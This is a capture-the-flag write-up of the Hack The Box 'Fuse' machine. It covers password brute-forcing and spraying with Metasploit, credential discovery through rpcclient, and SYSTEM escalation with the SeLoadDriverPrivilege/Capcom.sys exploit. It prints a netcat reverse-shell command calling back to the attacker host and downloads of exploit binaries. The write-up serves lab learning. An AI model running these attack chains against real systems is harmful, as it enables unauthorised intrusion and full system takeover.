Hackthebox Fuse Writeup
Information:~$
Title | Details |
---|---|
Name | Fuse |
IP | 10.10.10.193 |
Difficulty | Medium |
Points | 30 |
OS | Windows |
Brief:~$
Fuse is Medium rated Windows box. On PORT 80
We get potentail usernames and using cewl
we can make a password list form website. Which then can be used in msfconsole
to find the correct username and password. Thtne using smbpasswd
we cna change the password of tlavel
user and using rpcclinet
we get some new users and a password. For Initial foothold evil-winrm
can be used to gain access to system and then exploiting SeLoadDriverPrivilege
to gain authoriy over system
Reconnaissance:~$
Namp:~$
1
nmap -sC -sV -v -oN nmap/initial 10.10.10.193
We get a bunch of Interesting Information
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Nmap 7.80 scan initiated Mon Jul 6 19:03:55 2020 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.36s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-06 13:51:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/6%Time=5F03286B%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h37m28s, deviation: 4h02m31s, median: 17m26s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-07-06T06:54:40-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-06T13:54:39
|_ start_date: 2020-07-06T12:21:43
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 6 19:09:51 2020 -- 1 IP address (1 host up) scanned in 355.93 seconds
We get Few Ports open Let’s start with PORT 80
Enumeration:~$
On opening http://10.10.10.193 we get redirected to http://fuse.fabricorp.local/papercut/logs/html/index.htm
So let’s add fuse.fabricorp.local
to our host file
After spending some time on website and trying fuzzing I only got few usernames from
1
2
3
http://fuse.fabricorp.local/papercut/logs/html/papercut-print-log-2020-05-29.htm
http://fuse.fabricorp.local/papercut/logs/html/papercut-print-log-2020-05-30.htm
http://fuse.fabricorp.local/papercut/logs/html/papercut-print-log-2020-06-10.htm
1
2
3
4
pmerton
tlavel
sthompson
bhult
Okay we got usernames but where we can use them and what is the password
We can use cewl
to make a password list from website
1
cewl -d 5 -m 3 -w pass.lst http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
So after getting potential usernames and a password list let’s see if we can mount smb shares
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf5 auxiliary(scanner/smb/smb_login) > set RHOST fuse.htb
RHOST => fuse.htb
msf5 auxiliary(scanner/smb/smb_login) > set user_file user2.txt
user_file => user2.txt
msf5 auxiliary(scanner/smb/smb_login) > set pass_file pass.list
pass_file => pass.list
msf5 auxiliary(scanner/smb/smb_login) >
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:Print',
[!] 10.10.10.193:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:2020',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:PaperCut',
................
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
................
[*] fuse.htb:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We got a match let’s try to login
1
2
3
4
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
[vibhu@parrot]─[~/HTB/boxes/Fuse]$
Okay so we need to change password for smb We can use smbpasswd to do that
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HP-MFT01 Printer HP-MFT01
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
[vibhu@parrot]─[~/HTB/boxes/Fuse]$
We can use rpcclient for furtherr enumeration
1
2
3
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ rpcclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password:
rpcclient $>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
We get some new users save them user.list
On spending some time here and trying different things I got enumprinters
1
2
3
4
5
6
7
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
rpcclient $>
We get a password $fab@s3Rv1ce$1
btu for which user
Initial Foothold:~$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS fuse.htb
RHOSTS => fuse.htb
msf5 auxiliary(scanner/winrm/winrm_login) > set user_file user.list
user_file => user.list
msf5 auxiliary(scanner/winrm/winrm_login) > set password $fab@s3Rv1ce$1
password => $fab@s3Rv1ce$1
msf5 auxiliary(scanner/winrm/winrm_login) > show options
Module options (auxiliary/scanner/winrm/winrm_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD $fab@s3Rv1ce$1 no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS fuse.htb yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE user.list no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf5 auxiliary(scanner/winrm/winrm_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\pmerton:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\tlavel:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\sthompson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bhult:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bnielson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dandrews:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\mberbatov:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We can use evil-winrm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[vibhu@parrot]─[~/HTB/boxes/Fuse]$ evil-winrm -i fuse.htb -u svc-print -p '$fab@s3Rv1ce$1'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-print\Desktop> dir
Directory: C:\Users\svc-print\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/8/2020 4:37 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-print\Desktop> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Desktop>
Privilege Escalation:~$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts Group S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\>
We have privilege to LoadDriver So we are going to exploit that to gain authority over system
1
SeLoadDriverPrivilege Load and unload device drivers Enabled
But how Here’s an amazing article on exploiting it
For exploiting we need 2 files
Compile all the files and transfer them to machine along with nc.exe and netcat.bat
1
2
[vibhu@parrot]─[~/HTB/boxes/Fuse/priv/htb-scripts/exploit-fuse]$ cat netcat.bat
c:\temp\nc.exe 10.10.14.166 9001 -e cmd.exe
Let’s transfer the files
1
2
3
4
5
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/EOPLOADDRIVER.exe -o EOPLOADDRIVER.exe
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/ExploitCapcom_modded.exe -o ExploitCapcom.exe
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/Capcom.sys -o Capcom.sys
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/nc.exe -o nc.exe
*Evil-WinRM* PS C:\temp> wget http://10.10.14.166:8000/netcat.bat -o netcat.bat
Meanwhile on our server
1
2
3
4
5
6
7
[vibhu@parrot]─[~/HTB/boxes/Fuse/priv/htb-scripts/exploit-fuse]$ python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.193 - - [08/Jul/2020 17:22:11] "GET /EOPLOADDRIVER.exe HTTP/1.1" 200 -
10.10.10.193 - - [08/Jul/2020 17:22:26] "GET /ExploitCapcom_modded.exe HTTP/1.1" 200 -
10.10.10.193 - - [08/Jul/2020 17:22:39] "GET /Capcom.sys HTTP/1.1" 200 -
10.10.10.193 - - [08/Jul/2020 17:23:00] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.193 - - [08/Jul/2020 17:23:11] "GET /netcat.bat HTTP/1.1" 200 -
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/8/2020 5:10 AM 10576 Capcom.sys
-a---- 7/8/2020 5:10 AM 15360 EOPLOADDRIVER.exe
-a---- 7/8/2020 5:10 AM 275968 ExploitCapcom.exe
-a---- 7/8/2020 5:10 AM 59392 nc.exe
-a---- 7/8/2020 5:11 AM 44 netcat.bat
Let’s exploit it
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: c0000035, WinError: 0
*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000001A0DA410008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
Don’t forget to start a listner on our server
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[vibhu@parrot]─[~/HTB/boxes/Fuse/priv]$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.166] from (UNKNOWN) [10.10.10.193] 50066
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\temp>whoami
whoami
nt authority\system
C:\temp>cd /Users/Administrator/Desktop
cd /Users/Administrator/Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
6b2*********************e49494614
Resources:~$
Topic | Link |
---|---|
SeLoadDriverPrivilege | Here |
With this, we come to the end of the story of how I owned Fuse 😃
Thank you for reading !!!
I would love to hear about any suggestions or queries.